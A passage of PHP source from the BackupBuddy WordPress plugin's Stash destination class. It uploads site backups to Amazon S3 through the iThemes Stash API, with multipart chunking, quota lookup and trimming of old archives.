$settings['_multipart_backup_type_dir'] ); // For use later by file limiting. $this_part_number = $settings['_multipart_partnumber'] + 1; pb_backupbuddy::status( 'details', 'Stash beginning upload of part `' . $this_part_number . '` of `' . count( $settings['_multipart_counts'] ) . '` parts of file `' . $settings['_multipart_file'] . '` with multipart ID `' . $settings['_multipart_id'] . '`.' ); $response = $s3->upload_part( $settings['_multipart_upload_data']['bucket'], $settings['_multipart_upload_data']['object'], $settings['_multipart_id'], array( 'expect' => '100-continue', 'fileUpload' => $settings['_multipart_file'], 'partNumber' => $this_part_number, 'seekTo' => (integer) $settings['_multipart_counts'][ $settings['_multipart_partnumber'] ]['seekTo'], 'length' => (integer) $settings['_multipart_counts'][ $settings['_multipart_partnumber'] ]['length'], )); if(!$response->isOK()) { $this_error = 'Stash unable to upload file part for multipart upload `' . $settings['_multipart_id'] . '`. Details: `' . print_r( $response, true ) . '`.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } else { $uploaded_size = $response->header['_info']['size_upload']; $uploaded_speed = $response->header['_info']['speed_upload']; pb_backupbuddy::status( 'details', 'Uploaded size: ' . pb_backupbuddy::$format->file_size( $uploaded_size ) . ', Speed: ' . pb_backupbuddy::$format->file_size( $uploaded_speed ) . '/sec.' ); } // Load fileoptions to the send. pb_backupbuddy::status( 'details', 'About to load fileoptions data.' ); require_once( pb_backupbuddy::plugin_path() . '/classes/fileoptions.php' ); pb_backupbuddy::status( 'details', 'Fileoptions instance #5.' ); $fileoptions_obj = new pb_backupbuddy_fileoptions( backupbuddy_core::getLogDirectory() . 'fileoptions/send-' . $send_id . '.txt', $read_only = false, $ignore_lock = false, $create_file = false ); if ( true !== ( $result = $fileoptions_obj->is_ok() ) ) { pb_backupbuddy::status( 'error', __('Fatal Error #9034.8273473. Unable to access fileoptions data.', 'it-l10n-backupbuddy' ) . ' Error: ' . $result ); return false; } pb_backupbuddy::status( 'details', 'Fileoptions data loaded.' ); $fileoptions = &$fileoptions_obj->options; $update_status = 'Sent part ' . $this_part_number . ' of ' . count( $settings['_multipart_counts'] ) . '.'; // Made it here so success sending part. Increment for next part to send. $settings['_multipart_partnumber']++; if ( !isset( $settings['_multipart_counts'][ $settings['_multipart_partnumber'] ] ) ) { // No more parts exist for this file. Tell S3 the multipart upload is complete and move on. pb_backupbuddy::status( 'details', 'Stash getting parts with etags to notify S3 of completed multipart send.' ); $etag_parts = $s3->list_parts( $settings['_multipart_upload_data']['bucket'], $settings['_multipart_upload_data']['object'], $settings['_multipart_id'] ); pb_backupbuddy::status( 'details', 'Stash got parts list. Details: ' . print_r( $etag_parts, true ) ); pb_backupbuddy::status( 'details', 'Notifying S3 of multipart upload completion.' ); $response = $s3->complete_multipart_upload( $settings['_multipart_upload_data']['bucket'], $settings['_multipart_upload_data']['object'], $settings['_multipart_id'], $etag_parts ); if(!$response->isOK()) { $this_error = 'Stash unable to notify S3 of completion of all parts for multipart upload `' . $settings['_multipart_id'] . '`.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } else { pb_backupbuddy::status( 'details', 'Stash notified S3 of multipart completion.' ); } $backup_type_dir = $settings['_multipart_backup_type_dir']; // Notify Stash API that things were succesful. $done_url = $stash->get_upload_url( $settings['_multipart_file'], 'done', $remote_path . $backup_type_dir . basename( $settings['_multipart_file'] ) ); pb_backupbuddy::status( 'details', 'Notifying Stash of completed multipart upload with done url `' . $done_url . '`.' ); $request = new RequestCore( $done_url ); $response = $request->send_request(true); if(!$response->isOK()) { $this_error = 'Error #756834682. Could not finalize Stash upload. Response code: `' . $response->get_response_code() . '`; Response body: `' . $response->get_response_body() . '`; Response headers: `' . $response->get_response_header() . '`.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } else { // Good server response. // See if we got an optional json response. $upload_data = @json_decode($response->body, true ); if(isset($upload_data['error'])) { $this_error = 'Stash error(s): `' . implode( ' - ', $upload_data['error'] ) . '`.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } pb_backupbuddy::status( 'details', 'Stash success sending file `' . basename( $settings['_multipart_file'] ) . '`. File uploaded via multipart across `' . $this_part_number . '` parts and reported to Stash as completed.' ); } pb_backupbuddy::status( 'details', 'Stash has no more parts left for this multipart upload. Clearing multipart instance variables.' ); $settings['_multipart_partnumber'] = 0; $settings['_multipart_id'] = ''; $settings['_multipart_file'] = ''; $settings['_multipart_upload_data'] = array(); $settings['_multipart_transferspeeds'][] = $uploaded_speed; // Overall upload speed average. $uploaded_speed = array_sum( $settings['_multipart_transferspeeds'] ) / count( $settings['_multipart_counts'] ); pb_backupbuddy::status( 'details', 'Upload speed average of all chunks: `' . pb_backupbuddy::$format->file_size( $uploaded_speed ) . '`.' ); $settings['_multipart_counts'] = array(); // Update stats. $fileoptions['_multipart_status'] = $update_status; $fileoptions['finish_time'] = microtime(true); $fileoptions['status'] = 'success'; if ( isset( $uploaded_speed ) ) { $fileoptions['write_speed'] = $uploaded_speed; } $fileoptions_obj->save(); unset( $fileoptions ); } delete_transient( 'pb_backupbuddy_stashquota_' . $settings['itxapi_username'] ); // Delete quota transient since it probably has changed now. // Schedule to continue if anything is left to upload for this multipart of any individual files. if ( $settings['_multipart_id'] != '' ) { pb_backupbuddy::status( 'details', 'Stash multipart upload has more parts left. Scheduling next part send.' ); $cronTime = time(); $cronArgs = array( $settings, $file, $send_id, $delete_after ); $cronHashID = md5( $cronTime . serialize( $cronArgs ) ); $cronArgs[] = $cronHashID; $schedule_result = backupbuddy_core::schedule_single_event( $cronTime, 'destination_send', $cronArgs ); if ( true === $schedule_result ) { pb_backupbuddy::status( 'details', 'Next Stash chunk step cron event scheduled.' ); } else { pb_backupbuddy::status( 'error', 'Next Stash chunk step cron event FAILED to be scheduled.' ); } if ( '1' != pb_backupbuddy::$options['skip_spawn_cron_call'] ) { update_option( '_transient_doing_cron', 0 ); // Prevent cron-blocking for next item. spawn_cron( time() + 150 ); // Adds > 60 seconds to get around once per minute cron running limit. } $update_status = '<br>'; $totalSent = 0; for( $i = 0; $i < $settings['_multipart_partnumber']; $i++ ) { $totalSent += $settings['_multipart_counts'][ $i ]['length']; } pb_backupbuddy::status( 'details', 'settings: ' . print_r( $settings, true ) ); $percentSent = ceil( ( $totalSent / $settings['file_size'] ) * 100 ); $update_status .= '<div class="backupbuddy-progressbar" data-percent="' . $percentSent . '"><div class="backupbuddy-progressbar-label"></div></div>'; return array( $settings['_multipart_id'], 'Sent part ' . $this_part_number . ' of ' . count( $settings['_multipart_counts'] ) . ' parts.' . $update_status ); } } else { // end if multipart continuation. require_once( pb_backupbuddy::plugin_path() . '/classes/fileoptions.php' ); // Determine backup type directory (if zip). $backup_type_dir = ''; $backup_type = ''; if ( stristr( $file, '.zip' ) !== false ) { // If a zip try to determine backup type. pb_backupbuddy::status( 'details', 'Stash: Zip file. Detecting backup type if possible.' ); $serial = backupbuddy_core::get_serial_from_file( $file ); // See if we can get backup type from fileoptions data. pb_backupbuddy::status( 'details', 'Fileoptions instance #4.' ); $backup_options = new pb_backupbuddy_fileoptions( backupbuddy_core::getLogDirectory() . 'fileoptions/' . $serial . '.txt', $read_only = true, $ignore_lock = true ); if ( true !== ( $result = $backup_options->is_ok() ) ) { pb_backupbuddy::status( 'error', 'Unable to open fileoptions file `' . backupbuddy_core::getLogDirectory() . 'fileoptions/' . $serial . '.txt' . '`.' ); } else { if ( isset( $backup_options->options['integrity']['detected_type'] ) ) { pb_backupbuddy::status( 'details', 'Stash: Detected backup type as `' . $backup_options->options['integrity']['detected_type'] . '` via integrity check data.' ); $backup_type_dir = $backup_options->options['integrity']['detected_type'] . '/'; $backup_type = $backup_options->options['integrity']['detected_type']; } } // If still do not know backup type then attempt to deduce it from filename. if ( $backup_type == '' ) { if ( stristr( $file, '-db-' ) !== false ) { pb_backupbuddy::status( 'details', 'Stash: Detected backup type as `db` via filename.' ); $backup_type_dir = 'db/'; $backup_type = 'db'; } elseif ( stristr( $file, '-full-' ) !== false ) { pb_backupbuddy::status( 'details', 'Stash: Detected backup type as `full` via filename.' ); $backup_type_dir = 'full/'; $backup_type = 'full'; } elseif ( stristr( $file, '-files-' ) !== false ) { pb_backupbuddy::status( 'details', 'Stash: Detected backup type as `files` via filename.' ); $backup_type_dir = 'files/'; $backup_type = 'files'; } else { pb_backupbuddy::status( 'details', 'Stash: Could not detect backup type via integrity details nor filename.' ); } } } // Interact with Stash API. pb_backupbuddy::status( 'details', 'Determining Stash upload URL for `' . $file . '`.` with destination remote path `' . $remote_path . $backup_type_dir . basename( $file ) . '`.' ); $upload_url = $stash->get_upload_url( $file, 'request', $remote_path . $backup_type_dir . basename( $file ) ); pb_backupbuddy::status( 'details', 'Determined upload url: `' . $upload_url . '`.' ); $request = new RequestCore( $upload_url ); pb_backupbuddy::status( 'details', 'Sending Stash API request.' ); $response = $request->send_request( true ); // Validate response. if(!$response->isOK()) { $this_error = 'Stash request for upload credentials failed.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } if(!$upload_data = json_decode($response->body, true)) { $this_error = 'Stash API did not give a valid JSON response.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } if(isset($upload_data['error'])) { $this_error = 'Stash error(s): `' . implode( ' - ', $upload_data['error'] ) . '`.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } // Create S3 instance. pb_backupbuddy::status( 'details', 'Creating Stash S3 instance.' ); $s3 = new AmazonS3( $upload_data['credentials'] ); // the key, secret, token if ( $disable_ssl === true ) { @$s3->disable_ssl(true); } pb_backupbuddy::status( 'details', 'Stash S3 instance created.' ); // Handle chunking of file into a multipart upload (if applicable). $file_size = filesize( $file ); if ( ( $max_chunk_size >= self::MINIMUM_CHUNK_SIZE ) && ( ( $file_size / 1024 / 1024 ) > $max_chunk_size ) ) { // minimum chunk size is 5mb. Anything under 5mb we will not chunk. pb_backupbuddy::status( 'details', 'Stash file size of ' . pb_backupbuddy::$format->file_size( $file_size ) . ' exceeds max chunk size of ' . $max_chunk_size . 'MB set in settings for sending file as multipart upload.' ); // Initiate multipart upload with S3. pb_backupbuddy::status( 'details', 'Initiating Stash multipart upload.' ); $response = $s3->initiate_multipart_upload( $upload_data['bucket'], $upload_data['object'], array( 'encryption' => 'AES256', 'meta' => $meta, ) ); if(!$response->isOK()) { $this_error = 'Stash was unable to initiate multipart upload.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } else { $upload_id = (string) $response->body->UploadId; pb_backupbuddy::status( 'details', 'Stash initiated multipart upload with ID `' . $upload_id . '`.' ); } // Get chunk parts for multipart transfer. pb_backupbuddy::status( 'details', 'Stash getting multipart counts.' ); $parts = $s3->get_multipart_counts( $file_size, $max_chunk_size * 1024 * 1024 ); // Size of chunks expected to be in bytes. $multipart_destination_settings = $settings; $multipart_destination_settings['_multipart_id'] = $upload_id; $multipart_destination_settings['_multipart_partnumber'] = 0; $multipart_destination_settings['_multipart_file'] = $file; $multipart_destination_settings['_multipart_counts'] = $parts; $multipart_destination_settings['_multipart_upload_data'] = $upload_data; $multipart_destination_settings['_multipart_backup_type_dir'] = $backup_type_dir; $multipart_destination_settings['file_size'] = $file_size; pb_backupbuddy::status( 'details', 'Stash multipart settings to pass:' . print_r( $multipart_destination_settings, true ) ); // Schedule to process the parts. pb_backupbuddy::status( 'details', 'Stash scheduling send of next part(s). File: ' . $file ); $cronTime = time(); $cronArgs = array( $multipart_destination_settings, $file, $send_id, $delete_after ); $cronHashID = md5( $cronTime . serialize( $cronArgs ) ); $cronArgs[] = $cronHashID; backupbuddy_core::schedule_single_event( $cronTime, 'destination_send', $cronArgs ); if ( '1' != pb_backupbuddy::$options['skip_spawn_cron_call'] ) { update_option( '_transient_doing_cron', 0 ); // Prevent cron-blocking for next item. spawn_cron( time() + 150 ); // Adds > 60 seconds to get around once per minute cron running limit. } pb_backupbuddy::status( 'details', 'Stash scheduled send of next part(s). Done for this cycle.' ); return array( $upload_id, 'Starting send of ' . count( $multipart_destination_settings['_multipart_counts'] ) . ' parts.' ); } else { // did not meet chunking criteria. if ( $max_chunk_size != '0' ) { if ( ( $file_size / 1024 / 1024 ) < self::MINIMUM_CHUNK_SIZE ) { pb_backupbuddy::status( 'details', 'File size of ' . pb_backupbuddy::$format->file_size( $file_size ) . ' is less than the minimum allowed chunk size of ' . self::MINIMUM_CHUNK_SIZE . 'MB; not chunking into multipart upload.' ); } else { pb_backupbuddy::status( 'details', 'File size of ' . pb_backupbuddy::$format->file_size( $file_size ) . ' is less than your chunk size setting of ' . $max_chunk_size . ' MB; not chunking into multipart upload.' ); } } else { pb_backupbuddy::status( 'details', 'Max chunk size set to zero so not chunking into multipart upload.' ); } } // SEND file. if ( ( ! @file_exists( $file ) ) || ( @is_dir( $file ) ) ) { pb_backupbuddy::status( 'error', 'Error #848344: File to send, `' . $file . '`, does not exist or unreadable. It cannot be a directory.' ); return false; } pb_backupbuddy::status( 'details', 'About to put (upload) object to Stash. File: `' . $file . '`.' ); pb_backupbuddy::status( 'details', 'Meta: ' . print_r( $meta, true ) ); $response = $s3->create_object( $upload_data['bucket'], $upload_data['object'], array( 'fileUpload' => $file, 'encryption' => 'AES256', 'meta' => $meta, ) ); // Validate response. On failure notify Stash API that things went wrong. if(!$response->isOK()) { // Send FAILED. pb_backupbuddy::status( 'details', 'Failure uploading file to Stash storage. Notifying Stash API next. Upload details: `' . print_r( $response, true ) . '`.' ); pb_backupbuddy::status( 'details', 'Sending upload abort to `' . $abort_url . '`.' ); $request = new RequestCore($abort_url); $response = $request->send_request(true); $this_error = 'Could not upload to Stash, attempt aborted.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } else { // Send SUCCESS. pb_backupbuddy::status( 'details', 'Success uploading file to Stash storage. Notifying Stash API next. Upload details: `' . print_r( $response, true ) . '`.' ); $uploaded_size = $response->header['_info']['size_upload']; $uploaded_speed = $response->header['_info']['speed_upload']; pb_backupbuddy::status( 'details', 'Uploaded size: ' . pb_backupbuddy::$format->file_size( $uploaded_size ) . ', Speed: ' . pb_backupbuddy::$format->file_size( $uploaded_speed ) . '/sec.' ); } delete_transient( 'pb_backupbuddy_stashquota_' . $settings['itxapi_username'] ); // Delete quota transient since it probably has changed now. // Notify Stash API that things were succesful. $done_url = $stash->get_upload_url( $file, 'done', $remote_path . $backup_type_dir . basename( $file ) ); pb_backupbuddy::status( 'details', 'Notifying Stash of completed upload with done url `' . $done_url . '`.' ); $request = new RequestCore( $done_url ); $response = $request->send_request(true); if(!$response->isOK()) { $this_error = 'Error #247568834682. Could not finalize Stash upload. Response code: `' . $response->get_response_code() . '`; Response body: `' . $response->get_response_body() . '`; Response headers: `' . $response->get_response_header() . '`.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } else { // Good server response. // See if we got an optional json response. $upload_data = @json_decode($response->body, true ); if(isset($upload_data['error'])) { // Some kind of error. $this_error = 'Stash error(s): `' . implode( ' - ', $upload_data['error'] ) . '`.'; $pb_backupbuddy_destination_errors[] = $this_error; pb_backupbuddy::status( 'error', $this_error ); return false; } pb_backupbuddy::status( 'details', 'Stash success sending file `' . basename( $file ) . '`. File uploaded and reported to Stash as completed.' ); // Load destination fileoptions. pb_backupbuddy::status( 'details', 'About to load fileoptions data.' ); require_once( pb_backupbuddy::plugin_path() . '/classes/fileoptions.php' ); pb_backupbuddy::status( 'details', 'Fileoptions instance #3.' ); $fileoptions_obj = new pb_backupbuddy_fileoptions( backupbuddy_core::getLogDirectory() . 'fileoptions/send-' . $send_id . '.txt', $read_only = false, $ignore_lock = false, $create_file = false ); if ( true !== ( $result = $fileoptions_obj->is_ok() ) ) { pb_backupbuddy::status( 'error', __('Fatal Error #9034.84838. Unable to access fileoptions data.', 'it-l10n-backupbuddy' ) . ' Error: ' . $result ); return false; } pb_backupbuddy::status( 'details', 'Fileoptions data loaded.' ); $fileoptions = &$fileoptions_obj->options; // Save stats. if ( isset( $uploaded_speed ) ) { $fileoptions['write_speed'] = $uploaded_speed; $fileoptions_obj->save(); } //$fileoptions['finish_time'] = time(); //$fileoptions['status'] = 'success'; unset( $fileoptions_obj ); } // end foreach. } // End not multipart continuation. // BEGIN FILE LIMIT PROCESSING. Enforce archive limits if applicable. if ( $backup_type == 'full' ) { $limit = $full_archive_limit; pb_backupbuddy::status( 'details', 'Stash full backup archive limit of `' . $limit . '` of type `full` based on destination settings.' ); } elseif ( $backup_type == 'db' ) { $limit = $db_archive_limit; pb_backupbuddy::status( 'details', 'Stash database backup archive limit of `' . $limit . '` of type `db` based on destination settings.' ); } elseif ( $backup_type == 'files' ) { $limit = $files_archive_limit; pb_backupbuddy::status( 'details', 'Stash database backup archive limit of `' . $limit . '` of type `files` based on destination settings.' ); } else { $limit = 0; pb_backupbuddy::status( 'warning', 'Warning #54854895. Stash was unable to determine backup type (reported: `' . $backup_type . '`) so archive limits NOT enforced for this backup.' ); } if ( $limit > 0 ) { pb_backupbuddy::status( 'details', 'Stash archive limit enforcement beginning.' ); // S3 object for managing files. $s3_manage = new AmazonS3( $manage_data['credentials'] ); if ( $disable_ssl === true ) { @$s3_manage->disable_ssl(true); } // Get file listing. $response_manage = $s3_manage->list_objects($manage_data['bucket'], array('prefix'=> $manage_data['subkey'] . $remote_path . $backup_type_dir )); // list all the files in the subscriber account // Create array of backups and organize by date $prefix = backupbuddy_core::backup_prefix(); // List backups associated with this site by date. $backups = array(); foreach( $response_manage->body->Contents as $object ) { $file = str_replace( $manage_data['subkey'] . $remote_path . $backup_type_dir, '', $object->Key ); // Stash stores files in a directory per site so no need to check prefix here! if ( false !== strpos( $file, 'backup-' . $prefix . '-' ) ) { // if backup has this site prefix... $backups[$file] = strtotime( $object->LastModified ); } arsort( $backups ); pb_backupbuddy::status( 'details', 'Stash found `' . count( $backups ) . '` backups of this type when checking archive limits.' ); if ( ( count( $backups ) ) > $limit ) { pb_backupbuddy::status( 'details', 'More archives (' . count( $backups ) . ') than limit (' . $limit . ') allows. Trimming...' ); $i = 0; $delete_fail_count = 0; foreach( $backups as $buname => $butime ) { $i++; if ( $i > $limit ) { pb_backupbuddy::status ( 'details', 'Trimming excess file `' . $buname . '`...' ); $response = $s3_manage->delete_object( $manage_data['bucket'], $manage_data['subkey'] . $remote_path . $backup_type_dir . $buname ); if ( !$response->isOK() ) { pb_backupbuddy::status( 'details', 'Unable to delete excess Stash file `' . $buname . '`. Details: `' . print_r( $response, true ) . '`.' ); $delete_fail_count++; } } } pb_backupbuddy::status( 'details', 'Finished trimming excess backups.' ); if ( $delete_fail_count !== 0 ) { $error_message = 'Stash remote limit could not delete ' . $delete_fail_count . ' backups.'; pb_backupbuddy::status( 'error', $error_message ); backupbuddy_core::mail_error( $error_message ); } } pb_backupbuddy::status( 'details', 'Stash completed archive limiting.' ); } else { pb_backupbuddy::status( 'details', 'No Stash archive file limit to enforce.' ); } // End remote backup limit if ( isset( $fileoptions_obj ) ) { unset( $fileoptions_obj ); } // END FILE LIMIT PROCESSING. // Success if we made it this far. return true; } // End send(). public static function test( $settings ) { $remote_path = self::get_remote_path( $settings['directory'] ); // Has leading and trailng slashes. $manage_data = pb_backupbuddy_destination_stash::get_manage_data( $settings ); if ( ! is_array( $manage_data['credentials'] ) ) { // Credentials were somehow faulty. User changed password after prior page? Unlikely but you never know... $error_msg = 'Error #8484383c: Your authentication credentials for Stash failed. Verify your login and password to Stash. You may need to update the Stash destination settings. Perhaps you recently changed your password?'; pb_backupbuddy::status( 'error', $error_msg ); return $error_msg; } // Try sending a file. $send_response = pb_backupbuddy_destinations::send( $settings, dirname( dirname( __FILE__ ) ) . '/remote-send-test.php', $send_id = 'TEST-' . pb_backupbuddy::random_string( 12 ) ); // 3rd param true forces clearing of any current uploads. if ( false === $send_response ) { $send_response = 'Error sending test file to Stash.'; } else { $send_response = 'Success.'; } // S3 object for managing files. $s3_manage = new AmazonS3( $manage_data['credentials'] ); if ( $settings['ssl'] == 0 ) { @$s3_manage->disable_ssl(true); } // Delete sent file. $delete_response = 'Success.'; $delete_response = $s3_manage->delete_object( $manage_data['bucket'], $manage_data['subkey'] . $remote_path . 'remote-send-test.php' ); if ( !$delete_response->isOK() ) { $delete_response = 'Unable to delete test Stash file `remote-send-test.php`. Details: `' . print_r( $response, true ) . '`.'; pb_backupbuddy::status( 'details', $delete_response ); } else { $delete_response = 'Success.'; } // Load destination fileoptions. pb_backupbuddy::status( 'details', 'About to load fileoptions data.' ); require_once( pb_backupbuddy::plugin_path() . '/classes/fileoptions.php' ); pb_backupbuddy::status( 'details', 'Fileoptions instance #2.' ); $fileoptions_obj = new pb_backupbuddy_fileoptions( backupbuddy_core::getLogDirectory() . 'fileoptions/send-' . $send_id . '.txt', $read_only = false, $ignore_lock = false, $create_file = false ); if ( true !== ( $result = $fileoptions_obj->is_ok() ) ) { pb_backupbuddy::status( 'error', __('Fatal Error #9034.84838. Unable to access fileoptions data.', 'it-l10n-backupbuddy' ) . ' Error: ' . $result ); return false; } pb_backupbuddy::status( 'details', 'Fileoptions data loaded.' ); $fileoptions = &$fileoptions_obj->options; if ( ( 'Success.' != $send_response ) || ( 'Success.' != $delete_response ) ) { $fileoptions['status'] = 'failure'; $fileoptions_obj->save(); unset( $fileoptions_obj ); return 'Send details: `' . $send_response . '`. Delete details: `' . $delete_response . '`.'; } else { $fileoptions['status'] = 'success'; $fileoptions['finish_time'] = microtime(true); } $fileoptions_obj->save(); unset( $fileoptions_obj ); return true; } // End test(). /* get_quota() * * Get Stash quota. * */ public static function get_quota( $settings, $bypass_cache = false ) { $cache_time = 60*5; // 5 minutes. if ( $bypass_cache == false ) { $transient = get_transient( 'pb_backupbuddy_stashquota_' . $settings['itxapi_username'] ); if ( $transient !== false ) { pb_backupbuddy::status( 'details', 'Stash quota information CACHED. Returning cached version.' ); return $transient; } } else { pb_backupbuddy::status( 'details', 'Stash bypassing cached quota information. Getting new values.' ); } $itxapi_username = $settings['itxapi_username']; $itxapi_password = $settings['itxapi_password']; pb_backupbuddy::status( 'details', 'Loading ITX helper file.' ); require_once( dirname( __FILE__ ) . '/lib/class.itx_helper.php' ); pb_backupbuddy::status( 'details', 'Loading AWS SDK file for quota.' ); require_once( dirname( dirname( __FILE__ ) ) . '/_s3lib/aws-sdk/sdk.class.php' ); $stash = new ITXAPI_Helper( pb_backupbuddy_destination_stash::ITXAPI_KEY, pb_backupbuddy_destination_stash::ITXAPI_URL, $itxapi_username, $itxapi_password ); $quota_url = $stash->get_quota_url(); pb_backupbuddy::status( 'details', 'RequestCore getting quota.' ); $request = new RequestCore( $quota_url ); try { $response = $request->send_request(true); } catch (Exception $e) { $error = 'Error #32897329: Unable to get Stash quota information. Details:`' . $e->getMessage() . '`.'; pb_backupbuddy::status( 'error', $error ); echo $error; return false; } // See if the request was successful. if(!$response->isOK()) pb_backupbuddy::status( 'error', 'Stash request for quota failed.' ); // See if we got a json response. if(!$quota_data = json_decode($response->body, true)) pb_backupbuddy::status( 'error', 'Stash did not get valid json response.' ); // Finally see if the API returned an error. if(isset($quota_data['error'])) { if ( $quota_data['error']['code'] == '3002' ) { echo 'Invalid iThemes.com Member account password. Please re-authenticate to Stash from the Remote Destination Settings page.'; return false; } else { global $pb_backupbuddy_destination_errors; $pb_backupbuddy_destination_errors[] = implode( ', ', $quota_data['error'] ); pb_backupbuddy::status( 'error', 'Stash quota error: ' . implode( ', ', $quota_data['error'] ) ); } return false; } set_transient( 'pb_backupbuddy_stashquota_' . $settings['itxapi_username'], $quota_data, $cache_time ); return $quota_data; } // End get_quota(). /* get_manage_data() * * Get the required credentials and management data for managing user files. * * @param array $settings Destination settings. * @param bool $hideAuthAlert Default: false. Whether or not to suppress an alert box if authentication is failing. Useful for showing a more friendly message for that common error, or a re-auth form. * @return false|array Boolean false on failure. Array of data on success. */ public static function get_manage_data( $settings, $suppressAuthAlert = false ) { $itxapi_username = $settings['itxapi_username']; $itxapi_password = $settings['itxapi_password']; require_once( dirname( __FILE__ ) . '/lib/class.itx_helper.php' ); require_once( dirname( dirname( __FILE__ ) ) . '/_s3lib/aws-sdk/sdk.class.php' ); $stash = new ITXAPI_Helper( pb_backupbuddy_destination_stash::ITXAPI_KEY, pb_backupbuddy_destination_stash::ITXAPI_URL, $itxapi_username, $itxapi_password ); // get the url to use to request management credentials // url looks something like this - http://api.ithemes.com/stash/upload?apikey=sb31kesem0c879m0&expires=1347439653&subscriber=jwooley&signature=VFMbmXb5OorWwqE0iedOCsDtSgs%3D $manage_url = $stash->get_manage_url(); // create a new RequestCore to get the credentials // NOTE: RequestCore is part of the AWS SDK, it's a generic http request class. // You can use any available function to make the api request, the wordpress http class for example, // or even just the basic file_get_contents() $request = new RequestCore($manage_url); // send the api request try { $response = $request->send_request(true); } catch (Exception $e) { $error = 'Error #23873631: Unable to initiate Stash request. Details:`' . $e->getMessage() . '`.'; pb_backupbuddy::status( 'error', $error ); echo $error; return false; } // see if the request was successful if(!$response->isOK()) { //throw new Exception('Request for management credentials failed.'); $error = 'Request for management credentials failed.'; pb_backupbuddy::status( 'error', $error ); pb_backupbuddy::alert( $error ); return false; } // see if we got a json response if(!$manage_data = json_decode($response->body, true)) { $error = 'Did not get valid JSON response.'; pb_backupbuddy::status( 'error', $error ); pb_backupbuddy::alert( $error ); return false; } // finally see if the API returned an error if(isset($manage_data['error'])) { $error = 'Error: ' . implode(' - ', $manage_data['error']); pb_backupbuddy::status( 'error', $error ); if ( ( true === $suppressAuthAlert ) && ( '3002' == $manage_data['error']['code'] ) ) { // Alert suppressed. } else { pb_backupbuddy::alert( $error ); } return false; } if ( '1' == $settings['use_packaged_cert'] ) { pb_backupbuddy::status( 'details', 'Using packaged cacert.pem file based on destination settings.' ); $manage_data['ssl.certificate_authority'] = pb_backupbuddy::plugin_path() . '/destinations/_s3lib/aws-sdk/lib/requestcore/cacert.pem'; } return $manage_data; } // End get_manage_data(). /* get_remote_path() * * Returns the site-specific remote path to store into. * Slashes (caused by subdirectories in url) are replaced with underscores. * Always has a leading and trailing slash. * * @return string Ex: /dustinbolton.com_blog/ */ public static function get_remote_path( $directory = '' ) { $remote_path = site_url(); $remote_path = str_ireplace( 'http://', '', $remote_path ); $remote_path = str_ireplace( 'https://', '', $remote_path ); //$remote_path = preg_replace('/[^\da-z]/i', '_', $remote_path ); $remote_path = str_ireplace( '/', '_', $remote_path ); $remote_path = str_ireplace( '~', '_', $remote_path ); $remote_path = str_ireplace( ':', '_', $remote_path ); $remote_path = '/' . trim( $remote_path, '/\\' ) . '/'; $directory = trim( $directory, '/\\' ); if ( $directory != '' ) { $remote_path .= $directory . '/'; } return $remote_path; } // End get_remote_path(). /* get_quota_bar() * * Returns the progress quota bar showing usage. * * @return string HTML for the quota bar. */ public static function get_quota_bar( $account_info ) { //echo '<pre>' . print_r( $account_info, true ) . '</pre>'; $return = ''; $return .= ' <style> .outer_progress { -moz-border-radius: 4px; -webkit-border-radius: 4px; -khtml-border-radius: 4px; border-radius: 4px; border: 1px solid #DDD; background: #EEE; max-width: 700px; margin-left: auto; margin-right: auto; height: 30px; } .inner_progress { border-right: 1px solid #85bb3c; background: #8cc63f url("' . pb_backupbuddy::plugin_url() . '/destinations/stash/progress.png") 50% 50% repeat-x; height: 100%; } .progress_table { color: #5E7078; font-family: "Open Sans", Arial, Helvetica, Sans-Serif; font-size: 14px; line-height: 20px; text-align: center; margin-left: auto; margin-right: auto; margin-bottom: 20px; } </style>'; if ( isset( $account_info['quota_warning'] ) && ( $account_info['quota_warning'] != '' ) ) { //echo '<div style="color: red; max-width: 700px; margin-left: auto; margin-right: auto;"><b>Warning</b>: ' . $account_info['quota_warning'] . '</div><br>'; } $return .= ' <div class="outer_progress"> <div class="inner_progress" style="width: ' . $account_info['quota_used_percent'] . '%"></div> </div> <table align="center" class="progress_table"> <tbody><tr align="center"> <td style="width: 10%; font-weight: bold; text-align: center">Free Tier</td> <td style="width: 10%; font-weight: bold; text-align: center">Paid Tier</td> <td style="width: 10%"></td> <td style="width: 10%; font-weight: bold; text-align: center">Total</td> <td style="width: 10%; font-weight: bold; text-align: center">Used</td> <td style="width: 10%; font-weight: bold; text-align: center">Available</td> </tr> <tr align="center"> <td style="text-align: center">' . $account_info['quota_free_nice'] . '</td> <td style="text-align: center">'; if ( $account_info['quota_paid'] == '0' ) { $return .= 'none'; } else { $return .= $account_info['quota_paid_nice']; } $return .= '</td> <td></td> <td style="text-align: center">' . $account_info['quota_total_nice'] . '</td> <td style="text-align: center">' . $account_info['quota_used_nice'] . '</td> <td style="text-align: center">' . $account_info['quota_available_nice'] . '</td> </tr> '; $return .= ' </tbody></table>'; return $return; } // End get_quota_bar(). } // End class.